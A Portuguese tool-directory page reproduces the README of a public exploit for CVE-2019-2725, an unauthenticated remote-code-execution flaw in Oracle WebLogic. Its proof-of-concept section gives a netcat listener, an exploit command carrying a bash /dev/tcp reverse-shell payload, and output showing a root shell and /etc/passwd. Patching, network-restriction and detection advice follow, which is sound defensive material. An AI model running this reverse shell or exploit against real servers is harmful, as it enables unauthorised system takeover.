Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — Exploração de execução remota de código não autenticada para Oracle WebLogic Server (CVE-2019-2725) via desserialização em AsyncResponseService, entregando um shell reverso através de solicitações SOAP maliciosas. | Kitploit
Ferramentas/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

Exploração de execução remota de código não autenticada para Oracle WebLogic Server (CVE-2019-2725) via desserialização em AsyncResponseService, entregando um shell reverso através de solicitações SOAP maliciosas.

Ver Repositório
13há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-2725 – Execução Remota de Código Não Autenticada no Oracle WebLogic

Vulnerabilidade no componente Oracle WebLogic Server do Oracle Fusion Middleware (subcomponente: Web Services). As versões suportadas afetadas são 10.3.6.0.0 e 12.1.3.0.0. Uma vulnerabilidade facilmente explorável permite que um atacante não autenticado com acesso à rede via HTTP comprometa o Oracle WebLogic Server.

Visão Geral da Vulnerabilidade

ID do CVE: CVE-2019-2725
Gravidade: Crítica (CVSS v3: 9.8)
Tipo de Vulnerabilidade: Execução Remota de Código Não Autenticada (RCE)
Produto Afetado: Oracle WebLogic Server
Componente Afetado: AsyncResponseService
Autenticação Necessária: Não
Interação do Usuário Necessária: Não

O CVE-2019-2725 é uma vulnerabilidade crítica de desserialização no Oracle WebLogic Server que permite que atacantes remotos não autenticados executem comandos arbitrários do sistema por meio de uma solicitação SOAP especialmente criada enviada ao endpoint /_async/AsyncResponseService.


Versões Afetadas

Versões do Oracle WebLogic Server anteriores à Atualização Crítica de Patch de abril de 2019, incluindo, mas não se limitando a:

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

Descrição da Vulnerabilidade

A vulnerabilidade existe devido à desserialização insegura no AsyncResponseService.
Um atacante pode enviar um payload XML malicioso que resulta em execução arbitrária de comandos no sistema operacional subjacente sem autenticação.

Este problema é particularmente perigoso porque:

  • O endpoint geralmente está exposto externamente
  • Nenhuma credencial válida é necessária
  • A exploração leva diretamente ao comprometimento total do sistema

Cenário de Ataque

  1. O atacante identifica uma instância WebLogic exposta
  2. O atacante envia uma solicitação SOAP maliciosa para:
  3. O WebLogic desserializa dados controlados pelo atacante
  4. Comandos arbitrários do sistema operacional são executados
  5. O atacante obtém acesso remoto ao shell

Prova de Conceito (PoC)

🔹 Listener do Atacante (Segundo CLI)

Inicie um listener Netcat para receber o shell reverso:

nc -lvp 2323

🔹 Execução do Exploit (Primeiro CLI)

Execute o script de exploit contra o servidor WebLogic vulnerável:

python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'

Saída Esperada:

[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)

🔹 Resultado da Exploração Bem-Sucedida

No listener Netcat, um shell reverso é recebido:

Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

Mitigação e Remediação

Ações Recomendadas

  1. Aplicar a Atualização Crítica de Patch (CPU) da Oracle de abril de 2019
  • Atualize o Oracle WebLogic Server para uma versão que inclua as correções de segurança de abril de 2019 fornecidas pela Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html
  1. Restringir o Acesso ao Endpoint Vulnerável
  • Isso confirma a execução remota de comandos e o acesso em nível de sistema.
  • Garanta que este endpoint não esteja exposto a redes não confiáveis
  • Restrinja o acesso apenas a faixas de IP internas ou confiáveis
  1. Bloquear Acesso Não Confiável Usando Controles de Rede
  • Implemente regras rigorosas de firewall
  • Imponha o controle de acesso por meio de proxies reversos
  • Desative o acesso externo desnecessário aos serviços de gerenciamento e assíncronos do WebLogic
  1. Ativar Registro em Log e Monitoramento Contínuo
  • Monitore os logs de acesso HTTP
  • Alerte sobre padrões anormais de solicitações que visam endpoints assíncronos

Indicadores de Detecção

Os seguintes indicadores podem sugerir tentativa ou exploração bem-sucedida:

🔍 Indicadores de Rede e Aplicação

  • Solicitações para:
  • Payloads SOAP/XML suspeitos ou malformados
  • Respostas repetidas HTTP 202 Accepted de serviços assíncronos

🔍 Indicadores Baseados no Host

  • Conexões de rede de saída iniciadas pelo WebLogic Server
  • Execução inesperada de shell, como:
  • /bin/bash
  • /bin/sh
  • Criação de conexões de shell reverso para IPs ou portas desconhecidos

Recomendações de Monitoramento de Segurança

  • Habilite assinaturas de IDS/IPS para padrões conhecidos de exploração SOAP do WebLogic
  • Monitore o tráfego de saída dos servidores WebLogic
  • Implemente execução com privilégios mínimos para serviços de aplicação
  • Revise regularmente os logs de execução de processos do WebLogic

Créditos

Os seguintes repositórios públicos foram referenciados para compreensão e validação do exploit:

  • https://github.com/lufeirider/CVE-2019-2725
  • https://github.com/pimps/CVE-2019-2725

Baixar ferramenta